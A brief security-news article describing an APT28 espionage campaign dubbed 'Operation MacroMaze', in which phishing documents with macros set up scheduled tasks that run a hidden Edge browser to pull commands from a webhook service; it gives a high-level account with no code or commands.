A well-known Russian cyber espionage group tracked as APT28 has been running a covert campaign against selected organizations in Western and Central Europe from September 2025 through January 2026, according to researchers. This operation has been identified as “Operation MacroMaze.”

Rather than using complex malware, the attackers relied on simple but clever techniques that abuse widely used services to help their malware stay under the radar.

How the Attack Worked

• The operation started with spear-phishing emails sent to targeted individuals.
• These emails carried malicious Office documents. When victims opened these files, they triggered requests to a public webhook service (a type of service where webhooks can collect data), effectively notifying the attackers that the document had been opened.
• Inside the document, a macro script was designed to launch a small program that set up a scheduled task on the victim’s computer.
• This task executed a hidden browser session using Microsoft Edge in the background. Through this, the system contacted the webhook server to receive commands, ran them, and then sent back the results in the form of encoded HTML files.

This technique effectively turns a legitimate browser into part of the espionage toolset, blending the malicious traffic with normal activities and making detection harder.

Why This Matters

• APT28 is widely believed to be state-sponsored and tied to Russia’s military intelligence (GRU). The group has a long track record of high-profile espionage and disruption campaigns targeting government agencies, military organizations, and critical infrastructure across Europe and beyond.
• The use of basic tools and legitimate services in this campaign shows how threat actors can leverage ordinary software and infrastructure to carry out stealthy attacks.

In short, Operation MacroMaze isn’t about flashy malware — it’s about simple tools arranged cleverly to stay hidden while harvesting targeted information from compromised systems.